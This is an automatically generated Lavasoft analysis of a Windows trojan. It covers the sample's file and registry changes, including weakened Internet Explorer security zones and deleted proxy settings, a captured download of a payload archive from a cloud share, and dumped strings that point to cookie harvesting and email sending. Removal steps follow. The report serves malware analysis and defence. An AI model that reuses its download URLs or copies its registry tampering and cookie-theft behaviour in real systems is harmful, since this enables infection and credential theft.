Trojan.Win32.FlyStudio_48bf5525d5

by malwarelabrobot on April 10th, 2014 in Malware Descriptions.

Win32.Malware (Ikarus), Win32:Malware-gen (Avast), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 48bf5525d5e8e1c740cd4ef231afced2
SHA1: 7945ff10a1aa64c815ce0385fcb0ad203edd3075
SHA256: 160463324e47fbd2d0fb75ee1ef7afd45f6aaf6a861b830b1d5aeff48b4ccea3
SSDeep: 12288:T3ysoNyLR5FVxJu4g3bTp0jE97x3BeTGdvbHYVNJWAs7oZYjeM:qO3FVbeCj0f3YNJnVM
Size: 544746 bytes
File type: PE32
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company: no certificate found
Created at: 2013-12-18 06:28:15
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):

wuauclt.exe:540
%original file name%.exe:1580

The Trojan injects its code into the following process(es):
No processes have been created.

File activity

The process wuauclt.exe:540 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2016 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)

The Trojan deletes the following file(s):

%WinDir%\SoftwareDistribution\DataStore\Logs\tmp.edb (0 bytes)

The process %original file name%.exe:1580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_6.0.3.0[1].htm (376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\temp_oem_1.tmp.tmp (262240 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\oem_te.tmp (188 bytes)

Registry activity

The process %original file name%.exe:1580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 4C 3C 12 E8 66 0D 95 1B 82 30 83 3C 74 7B 9E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ??????
Product Name: ???????????
Product Version: 6.1.0.1
Legal Copyright: ????,????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 6.1.0.1
File Description: ???????????
Comments: ??????
Language: Korean (Korea)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 811008 278016 5.5445 e2749073ab7b572c2447f7657d1abfb9
.rdata 815104 307200 204288 5.54391 830ed079ed216e12bec4bdb8a30ef8bf
.data 1122304 200704 17920 5.52743 3c251e61f1c3d5f940df474ec942f3c6
.rsrc 1323008 184320 8704 4.51028 18a3ba1d43aa9161089d3934555882c0
0 0 0 0
0 0 0 0

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://hash.gslb.360safe.com/share.php?method=Share.download&cqid=58d2f7e32aebe3207eb542c9ccd2c804&dt=43.0abd35067e6f6b7bc56cc1872e6af930&e=1397157990&fhash=5a9d5be747c3b1a5da09cfe3a7fc5e770bf0fb94&fname=macms.zip&fsize=10011203&nid=13941752144901290&scid=43&st=9e2ea4f7dd8180e29a14606548c7c0b1&xqid=39039243
hxxp://101.226.11.74/wsdl47.yunpan.cn/share.php?method=Share.download&cqid=58d2f7e32aebe3207eb542c9ccd2c804&dt=43.0abd35067e6f6b7bc56cc1872e6af930&e=1397157990&fhash=5a9d5be747c3b1a5da09cfe3a7fc5e770bf0fb94&fname=macms.zip&fsize=10011203&nid=13941752144901290&scid=43&st=9e2ea4f7dd8180e29a14606548c7c0b1&xqid=39039243
wsdl47.yunpan.cn 101.226.161.214


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0
ET DROP Dshield Block Listed Source group 1

Traffic

GET /share.php?method=Share.download&cqid=58d2f7e32aebe3207eb542c9ccd2c804&dt=43.0abd35067e6f6b7bc56cc1872e6af930&e=1397157990&fhash=5a9d5be747c3b1a5da09cfe3a7fc5e770bf0fb94&fname=macms.zip&fsize=10011203&nid=13941752144901290&scid=43&st=9e2ea4f7dd8180e29a14606548c7c0b1&xqid=39039243 HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)
Range: bytes=0-
Connection: Keep-Alive
Cache-Control: no-cache
Host: wsdl47.yunpan.cn


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Wed, 09 Apr 2014 00:52:53 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: hXXp://101.226.11.74/wsdl47.yunpan.cn/share.php?method=Share.download&cqid=58d2f7e32aebe3207eb542c9ccd2c804&dt=43.0abd35067e6f6b7bc56cc1872e6af930&e=1397157990&fhash=5a9d5be747c3b1a5da09cfe3a7fc5e770bf0fb94&fname=macms.zip&fsize=10011203&nid=13941752144901290&scid=43&st=9e2ea4f7dd8180e29a14606548c7c0b1&xqid=39039243
<html>..<head><title>302 Found</title></hea
d>..<body bgcolor="white">..<center><h1>302 Found
</h1></center>..<hr><center>nginx</center&g
t;..</body>..</html>....



GET /wsdl47.yunpan.cn/share.php?method=Share.download&cqid=58d2f7e32aebe3207eb542c9ccd2c804&dt=43.0abd35067e6f6b7bc56cc1872e6af930&e=1397157990&fhash=5a9d5be747c3b1a5da09cfe3a7fc5e770bf0fb94&fname=macms.zip&fsize=10011203&nid=13941752144901290&scid=43&st=9e2ea4f7dd8180e29a14606548c7c0b1&xqid=39039243 HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)
Range: bytes=0-
Connection: Keep-Alive
Cache-Control: no-cache
Host: 101.226.11.74


HTTP/1.1 206 Partial Content
Server: nginx
Date: Wed, 09 Apr 2014 00:52:54 GMT
Content-Type: application/x-octet-stream
Content-Length: 10011203
Connection: close
Content-Transfer-Encoding: binary
cache-control: max-age=1800
X-Varnish: 903396231
Age: 0
Via: 1.1 varnish
Content-Disposition: attachment; filename="macms.zip"
X-Cache: MISS
X-SIP: 10.131.80.28
Expires: Wed, 09 Apr 2014 01:22:54 GMT
X-QHCDN: HIT
Content-Range: bytes 0-10011202/10011203
PK.........ujD.4.##*..........main.exe.Wc.&.....d.c....m..m..m....m...
.UIU.RI.$.n.....W..}.]-..............................T.5A..,9A.hj..oko
cb.g.o.gmm...o.o.d.of./(..oechD...M...AV..H...(. ....m x.......4..j...
...........~'.C..][email protected].>...:[email protected]..\..8
......k..i...............$..E....{..D..h>.{............{........u.H
....H.7..F..F.{...._...G..[...."..C .}.......2..h...r..}.=.m.a.3rTC.;-
(...!....r<X`.....3..R..Z.~?J_.........=.=....gQ.. x...h....i..L.D,
.O.;..^.#b....xE0F*.O....\.%..l\Do.V.|..f.A.......}c?.,.* ..j..7Is.].3
..>o.[......Ja........-=yA.a...r....@..^..Y.]...8P....o....PT......
.nB......W.6.[..e...*u....&13.^e.......Ux`..N....7. ....~<..w...<
;..6...b."!,Z@......'L....NE.b.]....1*.F0..ty5$*E.....2P.Ud$.-..?ci.8o
...EQcA..*U..._...HH.n...r.............e.....d......~....b......!..N=.
S.....E.....T.q........@9. ..Yc..fRj.........bJ..|...0.n8U>.^..Ls..
.\..d.!i...Z.a.......Gv..M.........6!........"u.Hw..2...`..T.[3l..v...
J..........@(.LV%C....-".?.bZ)...E!....a$:.....I...C&T.lVo.F.9.....%..
}[email protected]..%..g.'!v..-j.B....%...[?..$...H...B.
*.#?..2W>0...i..T...Q...B)1.H.I.Wo(.1_..t.U...R...........6....l.H.
..G #.........]..o.....B..X..p..r..7..O.7}G..q.........tw.......6..}..
.....Q......H..8...skR.....x..z.VK.1t?..3..W...p..#..S....&.I.4...5..p
.E.R.jC...<..g.J... t...].)............1!$.x.<.D....$..$s.V>.
.L'.C.<...:..#.h...R....r..m.;N.tKW....Y.c.ij......].....7.dGS.....
...PP..OO3.5{./....]....c1.S..../..O......Q.^s]..sM..._).....9.x.:
<<< skipped >>>
%original file name%.exe_1580:

.text
.rdata
.data
.rsrc
.aspack
.adata
t%SVh
t$(SSh
|$D.tm
~%UVW
u$SShe
Yt&hTcP
user32.dll
kernel32.dll
advapi32.dll
shell32.dll
User32.dll
gdiplus.dll
GdiPlus.dll
Kernel32.dll
ole32.dll
gdi32.dll
msimg32.dll
Ole32.dll
Gdi32.dll
Gdiplus.dll
UxTheme.dll
ShellExecuteEx
ShellExecuteA
GetProcessHeap
SetWindowsHookExA
UnhookWindowsHookEx
GetKeyState
RegCreateKeyA
RegOpenKeyA
RegCloseKey
RegFlushKey
RegDeleteKeyA
RegEnumKeyA
RegSaveKeyA
RegRestoreKeyA
RegNotifyChangeKeyValue
MsgWaitForMultipleObjects
GdipSetStringFormatHotkeyPrefix
\t0.tmp
unstall.exe
\unstall.dat
\unstall.exe
\unstall.ini
open.exe
http://
n.lMdw
.okJ^
PF.Nk)
%D$lh
c%xltbZ"
.DLDD
8.yB 
?v=6.1.0.1&pid=
oem_te.tmp
.VRb,
WScript.Shell
rundll32.exe url.dll,FileProtocolHandler
Y@Ex_DirectUI_MsgBox
msg_wnd
09/27/12
Microsoft.XMLHTTP
application/x-www-form-urlencoded
.Xr."
1*%Skv
k*.ls
%fWJF
)jH.Rq
~iC.xJn
\temp_oem_1.tmp
\main.exe
\date.dat
6.1.0.1
%dSUU
.eRp(L
.eOZZ
g@Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop
\date\ico.ico
\ico.ico
http://www.588dh.com/?
\date\taobao.ico
\taobao.ico
http://www.588dh.com/taobao.html
&setup=1&v=6.1.0.1&bst=2&pid=
&setup=1&v=6.1.0.1&bst=1&pid=
play_bst.exe
HotKey
WindowStyle
WINLOGON.EXE
&setup=1&v=6.1.0.1&pid=
10/05/12
\.YVV
Ï[H
L <
C:\Windows\System32\Drivers\etc\hostshttp://www.super-ec.cnhttp://wghai.com/echttp://qsyou.com/echttp://www.wghai.comhttp://bbs.wghai.com/forum-17-1.html/forum-12-1.html/memcp.php/ip.asp/time.asp/gonggao.txt/ec-user6.php/ec-bd.php/ec-jh.php
http://www.super-ec.cn
" class="txt" />Function Getcpuid()
Set cpuSet = GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_Processor")
getcpuid=cpu.ProcessorId
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
?HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
"@wininet.dll
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)
InternetOpenUrlA
HttpQueryInfoA
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
http=
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
HttpOpenRequestA
HttpSendRequestA
HttpAddRequestHeadersA
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies
\*.txt
scripting.FileSystemObject
%Documents and Settings%\IBM\Cookies\*.txt
Content.IE5\
=MSScriptControl.ScriptControl
for(var i=0;i
A=hexstr.substr(i,1).toUpperCase();
arr[arr.length]=A;
for(var i=0;i
var len=arr.length-i-1;
zero =parseInt(arr[i])*Math.pow(16,len);
var B=Math.max(num);var Y;var S=B;var sarr=[];var yarr=[];
yarr[yarr.length]=Y;
return S yarr.reverse().join('');
A=hexstr.toUpperCase();
arr[arr.length]='\\u' D2H(hexstr.charCodeAt(i));
return arr.join('');
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
RASAPI32.dll
WinExec
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
GetViewportOrgEx
GDI32.dll
WINMM.dll
WINSPOOL.DRV
RegOpenKeyExA
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
COMCTL32.dll
WS2_32.dll
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
GetCPInfo
CreateDialogIndirectParamA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
RegCreateKeyExA
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
1.1.3
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
d5e8e1c740cd4ef231afced2.exe
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
rasapi32.dll
winmm.dll
winspool.drv
oleaut32.dll
comctl32.dll
ws2_32.dll
wininet.dll
cdd.JLLEVWWYeffjbcc
(*.*)


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    wuauclt.exe:540
    %original file name%.exe:1580

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
    %WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2016 bytes)
    %WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_6.0.3.0[1].htm (376 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\temp_oem_1.tmp.tmp (262240 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\oem_te.tmp (188 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now